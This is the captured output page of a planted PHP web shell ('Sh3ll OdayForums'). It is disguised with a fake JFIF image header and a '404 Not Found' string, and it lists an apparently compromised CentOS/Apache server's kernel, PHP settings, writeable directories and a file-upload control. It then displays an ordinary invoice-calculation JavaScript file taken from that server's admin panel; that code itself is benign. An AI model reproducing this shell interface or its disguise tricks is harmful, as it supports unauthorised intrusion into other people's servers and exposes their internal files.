����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/adimi/my-assets/js/admin_js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/adimi/my-assets/js/admin_js/invoice.js
"use strict";
//Add invocie row field
function addInputField(t) {
    //Variable declaratipn
    var count = 2,
        limits = 500;

    if (count == limits) alert("You have reached the limit of adding " + count + " inputs");
    else {
        var a = "product_name" + count,
            e = document.createElement("tr");
        e.innerHTML = "<td><input type='text' name='product_name' placeholder='Product Name' onkeypress='invoice_productList(" + count + ");' class='form-control productSelection' required='' id='product_name" + count + "' ><input type='hidden' class='autocomplete_hidden_value product_id_" + count + "' name='product_id[]' id='SchoolHiddenId'/></td><td><input type='text' name='available_quantity[]' id='' class='form-control text-right available_quantity_" + count + "' placeholder='0' readonly='' /></td><td><input type='text' class='form-control text-right unit_" + count + "' placeholder='None' readonly='' /></td><td><input type='number' name='product_quantity[]' onkeyup='quantity_calculate(" + count + ");' onchange='quantity_calculate(" + count + ");' id='total_qntt_" + count + "' class='form-control text-right' value='1' min='1' /></td><td><input type='number' name='product_rate[]' onkeyup='quantity_calculate(" + count + ");' onchange='quantity_calculate(" + count + ");' placeholder='0.00' min='0' id='price_item_" + count + "' class='price_item" + count + " form-control text-right' required='' /></td><td><input type='number' name='discount[]' onkeyup='quantity_calculate(" + count + ");' onchange='quantity_calculate(" + count + ");' id='discount_" + count + "' class='form-control text-right' placeholder='0.00' min='0' /></td><td><input class='total_price form-control text-right' type='text' name='total_price[]' id='total_price_" + count + "' placeholder='0.00' tabindex='' readonly='readonly' /></td><td><input type='hidden' id='cgst_" + count + "' class='cgst'/> <input type='hidden' id='sgst_" + count + "' class='sgst'/><input type='hidden' id='igst_" + count + "' class='igst'/><input type='hidden' id='total_cgst_" + count + "' class='total_cgst' name='cgst[]' /><input type='hidden' id='total_sgst_" + count + "' class='total_sgst' name='sgst[]'/><input type='hidden' id='total_igst_" + count + "' class='total_igst' name='igst[]'/><input type='hidden' name='cgst_id[]' id='cgst_id_" + count + "'><input type='hidden' name='sgst_id[]' id='sgst_id_" + count + "'><input type='hidden' name='igst_id[]' id='igst_id_" + count + "'><input type='hidden' name='variant_id[]' id='variant_" + count + "'><input type='hidden' id='total_discount_" + count + "' /><input type='hidden' id='all_discount_" + count + "' class='total_discount'/><button style='text-align: right;' class='btn btn-danger' type='button' value='Delete' onclick='deleteRow(this)'>Delete</button></td>", document.getElementById(t).appendChild(e), document.getElementById(a).focus(), count++
    }
}
//Add edit invocie row field
function addEditInvoiceItem(t) {
    //Variable declaratipn
    var rows = $('#edit_invoice tbody tr').length;
    var count = rows + 1,
        limits = 500;

    if (count == limits) alert("You have reached the limit of adding " + count + " inputs");
    else {
        var a = "product_name" + count,
            e = document.createElement("tr");
        e.innerHTML = "<td><input type='text' name='product_name' placeholder='Product Name' onkeypress='invoice_productList(" + count + ");' class='form-control productSelection' required='' id='product_name" + count + "' ><input type='hidden' class='autocomplete_hidden_value product_id_" + count + "' name='product_id[]' id='SchoolHiddenId'/></td><td><input type='text' name='available_quantity[]' id='' class='form-control text-right available_quantity_" + count + "' placeholder='0' readonly='' /></td><td><input type='text' class='form-control text-right unit_" + count + "' placeholder='None' readonly='' /></td><td><input type='number' name='product_quantity[]' onkeyup='quantity_calculate(" + count + ");' onchange='quantity_calculate(" + count + ");' id='total_qntt_" + count + "' class='form-control text-right' value='1' min='1' /></td><td><input type='number' name='product_rate[]' onkeyup='quantity_calculate(" + count + ");' onchange='quantity_calculate(" + count + ");' placeholder='0.00' min='0' id='price_item_" + count + "' class='price_item" + count + " form-control text-right' required='' /></td><td><input type='number' name='discount[]' onkeyup='quantity_calculate(" + count + ");' onchange='quantity_calculate(" + count + ");' id='discount_" + count + "' class='form-control text-right' placeholder='0.00' min='0' /></td><td><input class='total_price form-control text-right' type='text' name='total_price[]' id='total_price_" + count + "' placeholder='0.00' tabindex='' readonly='readonly' /></td><td><input type='hidden' id='cgst_" + count + "' class='cgst'/> <input type='hidden' id='sgst_" + count + "' class='sgst'/><input type='hidden' id='igst_" + count + "' class='igst'/><input type='hidden' id='total_cgst_" + count + "' class='total_cgst' name='cgst[]' /><input type='hidden' id='total_sgst_" + count + "' class='total_sgst' name='sgst[]'/><input type='hidden' id='total_igst_" + count + "' class='total_igst' name='igst[]'/><input type='hidden' name='cgst_id[]' id='cgst_id_" + count + "'><input type='hidden' name='sgst_id[]' id='sgst_id_" + count + "'><input type='hidden' name='igst_id[]' id='igst_id_" + count + "'><input type='hidden' name='variant_id[]' id='variant_" + count + "'><input type='hidden' id='total_discount_" + count + "' /><input type='hidden' id='all_discount_" + count + "' class='total_discount'/><button style='text-align: right;' class='btn btn-danger' type='button' value='Delete' onclick='deleteRow(this)'>Delete</button></td>", document.getElementById(t).appendChild(e), document.getElementById(a).focus(), count++
    }
}

//after select variant check  limit to order limit
function  quantity_limit(item) {
    let current_quantity = $("#total_qntt_" + item).val();
    let available_quantity = $("#avl_qntt_" + item).val();
    if( parseInt(available_quantity) < parseInt(current_quantity)){
        alert('stock not available');
        $("#total_qntt_" + item).val(1);
        return false;
    }
    quantity_calculate(item);
}
//Quantity calculate
function quantity_calculate(item) {
    var quantity    = $("#total_qntt_" + item).val();
    var price_item  = $("#price_item_" + item).val();
    var discount    = $("#discount_" + item).val();
    var total_discount = $("#total_discount_" + item).val();
    var cgst        = $("#cgst_" + item).val();
    var sgst        = $("#sgst_" + item).val();
    var igst        = $("#igst_" + item).val();

    var all_discount = discount * quantity;
    $("#all_discount_" + item).val(all_discount);

    //Tax calculation
    var net_price = (quantity * price_item) - all_discount;
    var cgst_tax  = (net_price * cgst);
    var sgst_tax  = (net_price * sgst);
    var igst_tax  = (net_price * igst);

    //Tax calculation set
    $("#total_cgst_" + item).val(cgst_tax);
    $("#total_sgst_" + item).val(sgst_tax);
    $("#total_igst_" + item).val(igst_tax);

    if (quantity > 0) {
        var n = quantity * price_item;
        $("#total_price_" + item).val(n);
        $("#quantity_" + item).text('[ '+quantity+' ]');
        $(".qnt_price_" + item).text('('+quantity+' x '+price_item+')');
        $(".total_price_bill_" + item).text(n);
    }else {
        var n = quantity * price_item;
        $("#total_price_" + item).val(n);
    }
    calculateSum();
    invoice_paidamount();
}


//Calculate all summation
function calculateSum() {
    var cgst = 0;
    var sgst = 0;
    var igst = 0;
    var e = 0;
    var f = 0;
    var total_discount = 0;
    var total_price = 0;
    var inv_dis = 0;
    var ser_chg = 0;
    var shipping_charge=0;
    var sum=0;
    //Total CGST
    $(".total_cgst").each(function() {
        isNaN(this.value) || 0 == this.value.length || (cgst += parseFloat(this.value))
    }),
        $("#total_cgst").val(cgst.toFixed(2)),
        $(".total_cgst_bill").text(cgst.toFixed(2)),

        //Total SGST
        $(".total_sgst").each(function() {
            isNaN(this.value) || 0 == this.value.length || (sgst += parseFloat(this.value))
        }),
        $("#total_sgst").val(sgst.toFixed(2)),
        $(".total_sgst_bill").text(sgst.toFixed(2)),

        //Total IGST
        $(".total_igst").each(function() {
            isNaN(this.value) || 0 == this.value.length || (igst += parseFloat(this.value))
        }),
        $("#total_igst").val(igst.toFixed(2)),
        $(".total_igst_bill").text(igst.toFixed(2)),

        //Total Discount
        $(".total_discount").each(function() {
            isNaN(this.value) || 0 == this.value.length || (total_discount += parseFloat(this.value))
        }),
        $("#total_discount_ammount").val(total_discount.toFixed(2)),
        $(".total_discount_bill").text(total_discount.toFixed(2)),

        //Total Price
        $(".total_price").each(function() {
            isNaN(this.value) || 0 == this.value.length || (total_price += parseFloat(this.value))
        }),

        cgst = cgst.toFixed(2),
        sgst = sgst.toFixed(2),
        igst = igst.toFixed(2),
        e    = total_price.toFixed(2),
        f    = total_discount.toFixed(2),
        inv_dis = $("#invoice_discount").val(),
        ser_chg = $("#service_charge").val();
    shipping_charge = (($("#shipping_charge").val())? $("#shipping_charge").val() : 0);

    sum = +cgst+ +sgst+ +igst+ +e+ - f+ - inv_dis+ +ser_chg + +shipping_charge;
    $("#grandTotal").val(sum.toFixed(2));
    $(".total_bill").text(sum.toFixed(2));

    invoice_paidamount();
}

//Inovice paid amount
function invoice_paidamount() {
    var t = $("#grandTotal").val(),
        a = $("#paidAmount").val(),
        e = t - a;
    var test = e.toFixed(2);
    $("#dueAmmount").val(test)
}

//Stock limit check
function stockLimit(t) {
    var a = $("#total_qntt_" + t).val(),
        e = $(".product_id_" + t).val(),
        o = $(".baseUrl").val();
    $.ajax({
        type: "POST",
        url: o + "Cinvoice/product_stock_check",
        data: {
            product_id: e
        },
        cache: !1,
        success: function(e) {
            if (a > Number(e)) {
                var o = "You can purchase maximum " + e + " Items";
                alert(o), $("#qty_item_" + t).val("0"), $("#total_qntt_" + t).val("0"), $("#total_price_" + t).val("0")
            }
        }
    })
}

//Stock limit check by ajax
function stockLimitAjax(t) {
    var a = $("#total_qntt_" + t).val(),
        e = $(".product_id_" + t).val(),
        o = $(".baseUrl").val();
    $.ajax({
        type: "POST",
        url: o + "Cinvoice/product_stock_check",
        data: {
            product_id: e
        },
        cache: !1,
        success: function(e) {
            if (a > Number(e)) {
                var o = "You can purchase maximum " + e + " Items";
                alert(o), $("#qty_item_" + t).val("0"), $("#total_qntt_" + t).val("0"), $("#total_price_" + t).val("0.00"), calculateSum()
            }
        }
    })
}

//Invoice full paid
function full_paid() {
    var grandTotal = $("#grandTotal").val();
    $("#paidAmount").val(grandTotal);
    calculateSum();
    invoice_paidamount();
}

//Delete a row from invoice table
function deleteRow(t) {
    var a = $("#normalinvoice > tbody > tr").length;
    if (1 == a) {
        alert("There only one row you can't delete.");
        return false;
    }else {
        var e = t.parentNode.parentNode;
        e.parentNode.removeChild(e);
        calculateSum();
        invoice_paidamount();
    }

    calculateSum();
    invoice_paidamount();

    $('#item-number').html('0');
    $(".itemNumber>tr").each(function(i){
        $('#item-number').html(i+1);
        $('.item_bill').html(i+1);
    });
}

//Delete a pos row from POS table
function deletePosRow(t) {

    $("#"+t).remove();
    $("."+t).remove();

    calculateSum();
    invoice_paidamount();

    $('#item-number').html('0');
    $(".itemNumber>tr").each(function(i){
        $('#item-number').html(i+1);
        $('.item_bill').html(i+1);
    });
}

ZeroDay Forums Mini